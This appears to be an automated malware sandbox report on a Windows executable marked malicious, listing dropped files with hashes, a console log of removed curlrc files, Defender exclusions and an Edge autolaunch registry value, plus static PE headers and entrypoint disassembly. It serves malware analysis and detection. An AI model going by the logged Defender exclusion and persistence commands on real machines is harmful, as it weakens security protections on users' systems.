                                                                                                                              SHA-512:5D72F64B8E5C42A3C9A7BCBBE8A1598A85402ADE4F312AB9E26869F8B39952A3AA037F2CF7DA89E686C5BC3FCB221FEEAE077B9FFD2EEF98DAC0E307637FE7BD
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b...&.i.&.i.&.i./.....i.6qh.%.i.6q..".i.6qj.%.i.6qm...i.6ql.*.i.Vth.$.i.&.h...i.npm.).i.npi.'.i.np..'.i.&...'.i.npk.'.i.Rich&.i.........PE..d...a..f.........." ...)..................................................................`..........................................O......@W..........P....p..@...............l....>..T...........................`=..@...............x............................text............................... ..`.rdata...l.......n..................@..@.data........`.......L..............@....pdata..@....p.......N..............@..@.rsrc...P............Z..............@..@.reloc..l............`..............@..B........................................................................................................................................................................................................................................

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_2tgywyke.nsp.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_42t15kgk.lif.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_4hgt2obz.1nk.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_cnxjiwyb.5ic.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_cpkhrtd1.wng.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_esz2me2o.4yq.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_gkizoxel.b5l.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_ita4czgs.dqj.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_oz11skp1.i0i.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_qjcrup5p.03t.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_qojbd3gp.yi2.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_qv5xyoo3.yy1.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_tv5svyvm.gf5.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_woef13jk.z2a.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_xzmk1kwu.bqe.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_zqgnga3f.m4n.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              \Device\ConDrv

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\bav64.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1545
                                                                                                                              Entropy (8bit):5.106498895470587
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:VQU2njCigi6idijpu6/bQz5X5p5/5J58I5c5G:VWosRbFP2ICs
                                                                                                                              MD5:E82297BB5644B9F3ECD48A30781D2E77
                                                                                                                              SHA1:5B3D405BC8AE9A9675CB03C83B8158FBB29C66FD
                                                                                                                              SHA-256:C3376FC31E2F3C6B044EE9B44E1DACF534513BE8A7BF2B2BB60E4A64ACE6CDB0
                                                                                                                              SHA-512:928CFC518F9348F5CEE912A3CD23E245F8EE4C1CDC785B7040D95BA5BD1797ED4F2496DB3136CA4D3EC6817B05F5DABCB80D708CF9257E6E8EA696808B41E0EC
                                                                                                                              Malicious:false
                                                                                                                              Preview:[-] handle_trash_files: remove: unknown error: "C:\DumpStack.log.tmp"..[+] File removed success C:\ProgramData\.curlrc..[+] File removed success C:\ProgramData\_curlrc..[+] File removed success C:\Users\user\AppData\Roaming\.curlrc..[+] File removed success C:\Users\user\AppData\Roaming\_curlrc..[+] File removed success C:\Users\user\AppData\Local\.curlrc..[+] File removed success C:\Users\user\AppData\Local\IconCache.db..[+] File removed success C:\Users\user\AppData\Local\_curlrc..[+] Temp file removed success C:\Users\user\AppData\Local\Temp\chrome.exe..[+] C:\Windows\Temp exe files not found...[+] Registry value removed success: MicrosoftEdgeAutoLaunch_AA501BBC086EBD358E626B900A322692..[+] Registry value not found...[-] handle_trash_files: remove: unknown error: "C:\DumpStack.log.tmp"..[+] Exclusion removed success: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"..[+] Exclusion removed success: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\U

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                              Entropy (8bit):6.548853831296084
                                                                                                                              TrID:
                                                                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                              File name:dYUteuvmHn.exe
                                                                                                                              File size:1'694'720 bytes
                                                                                                                              MD5:f5bd4bbc494017262a22785e5b53f316
                                                                                                                              SHA1:eed0865613144eba454454d91a2b92fc2717c068
                                                                                                                              SHA256:79629ab0850f3dd1f61b13a3fd69570425faca6b15a4b453b9a2e0834ee9728e
                                                                                                                              SHA512:47478244cfcb70730fca8bd7c623d4815a47aecad8609cc2801b879a1017b27f53f311fc68e3d83285c7f39c548cf45028602f0761d6efd734686cb5f2568ebc
                                                                                                                              SSDEEP:49152:zic0Ug34MNv4Kwu3zuSTQP76NuudqxdeY1wn8mZ:DFcbTQP76Nuudqxan
                                                                                                                              TLSH:0C759D56B3E401F8E1A7C138C9574A1BE7B2B855036097DF03A486662F23BE16F3E761
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iO...!@..!@..!@..$Ad.!@..%A..!@.."A..!@.."A..!@..%A..!@..$A..!@.. A..!@.. @..!@..(A..!@...@..!@..#A..!@Rich..!@........PE..d..

                                                                                                                              File Icon

                                                                                                                              Icon Hash:00928e8e8686b000

                                                                                                                              Static PE Info

                                                                                                                              General

                                                                                                                              Entrypoint:0x1400139d0
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x140000000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x672A2DFD [Tue Nov 5 14:38:53 2024 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:6
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:6
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:6
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:c5f00a6fe8c8d189216e47cc0bff8748

                                                                                                                              Entrypoint Preview

                                                                                                                              Instruction
                                                                                                                              dec eax
                                                                                                                              sub esp, 28h
                                                                                                                              call 00007FC4FCFD1CACh
                                                                                                                              dec eax
                                                                                                                              add esp, 28h
                                                                                                                              jmp 00007FC4FCFD120Fh
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              dec eax
                                                                                                                              sub esp, 28h
                                                                                                                              dec ebp
                                                                                                                              mov eax, dword ptr [ecx+38h]
                                                                                                                              dec eax
                                                                                                                              mov ecx, edx
                                                                                                                              dec ecx
                                                                                                                              mov edx, ecx
                                                                                                                              call 00007FC4FCFD13A2h
                                                                                                                              mov eax, 00000001h
                                                                                                                              dec eax
                                                                                                                              add esp, 28h
                                                                                                                              ret
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              inc eax
                                                                                                                              push ebx
                                                                                                                              inc ebp
                                                                                                                              mov ebx, dword ptr [eax]
                                                                                                                              dec eax
                                                                                                                              mov ebx, edx
                                                                                                                              inc ecx
                                                                                                                              and ebx, FFFFFFF8h
                                                                                                                              dec esp
                                                                                                                              mov ecx, ecx
                                                                                                                              inc ecx
                                                                                                                              test byte ptr [eax], 00000004h
                                                                                                                              dec esp
                                                                                                                              mov edx, ecx
                                                                                                                              je 00007FC4FCFD13A5h
                                                                                                                              inc ecx
                                                                                                                              mov eax, dword ptr [eax+08h]
                                                                                                                              dec ebp
                                                                                                                              arpl word ptr [eax+04h], dx
                                                                                                                              neg eax
                                                                                                                              dec esp
                                                                                                                              add edx, ecx
                                                                                                                              dec eax
                                                                                                                              arpl ax, cx
                                                                                                                              dec esp
                                                                                                                              and edx, ecx
                                                                                                                              dec ecx
                                                                                                                              arpl bx, ax
                                                                                                                              dec edx
                                                                                                                              mov edx, dword ptr [eax+edx]
                                                                                                                              dec eax
                                                                                                                              mov eax, dword ptr [ebx+10h]
                                                                                                                              mov ecx, dword ptr [eax+08h]
                                                                                                                              dec eax
                                                                                                                              mov eax, dword ptr [ebx+08h]
                                                                                                                              test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                              je 00007FC4FCFD139Dh
                                                                                                                              movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                              and eax, FFFFFFF0h
                                                                                                                              dec esp
                                                                                                                              add ecx, eax
                                                                                                                              dec esp
                                                                                                                              xor ecx, edx
                                                                                                                              dec ecx
                                                                                                                              mov ecx, ecx
                                                                                                                              pop ebx
                                                                                                                              jmp 00007FC4FCFD1016h
                                                                                                                              int3
                                                                                                                              dec eax
                                                                                                                              mov dword ptr [esp+10h], ebx
                                                                                                                              dec eax
                                                                                                                              mov dword ptr [esp+18h], esi
                                                                                                                              push ebp
                                                                                                                              push edi
                                                                                                                              inc ecx
                                                                                                                              push esi
                                                                                                                              dec eax
                                                                                                                              mov ebp, esp
                                                                                                                              dec eax
                                                                                                                              sub esp, 10h
                                                                                                                              xor eax, eax
                                                                                                                              xor ecx, ecx
                                                                                                                              cpuid
                                                                                                                              inc esp
                                                                                                                              mov eax, ecx
                                                                                                                              inc esp
                                                                                                                              mov edx, edx
                                                                                                                              inc ecx
                                                                                                                              xor edx, 49656E69h
                                                                                                                              inc ecx
                                                                                                                              xor eax, 6C65746Eh
                                                                                                                              inc esp
                                                                                                                              mov ecx, ebx
                                                                                                                              inc esp
                                                                                                                              mov esi, eax
                                                                                                                              xor ecx, ecx

                                                                                                                              Data Directories

                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x19985c0x28.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a20000x1e0.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x19e0000x285c.pdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a30000x984.reloc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x194a400x38.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1949000x140.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x2e0000x2b0.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                              Sections

                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x10000x2c9f40x2ca003eaa18591f27f44185d8b5b5f0e3c9d0False0.5290999212184874data6.487587820875137IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                              .rdata0x2e0000x16c1560x16c200f0a14bda343552250339806241ec51fdFalse0.4839572873755578data6.5424708847173365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .data0x19b0000x2b280x14008011fd480e967751b06b13543764e907False0.183984375DOS executable (block device driver)3.045131551850154IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .pdata0x19e0000x285c0x2a00cbf1a6a006904473afc52a57a282369aFalse0.4675409226190476data5.350122810230798IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .fptable0x1a10000x1000x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .rsrc0x1a20000x1e00x200fe464930c0f6ab8cb6c8d3c7dcb0d98cFalse0.52734375data4.704363013479242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .reloc0x1a30000x9840xa005f205b7170b58890946c62ed249f89d5False0.515234375data5.348493313637984IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                              Resources

                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                              RT_MANIFEST0x1a20600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                              Imports

                                                                                                                              DLLImport
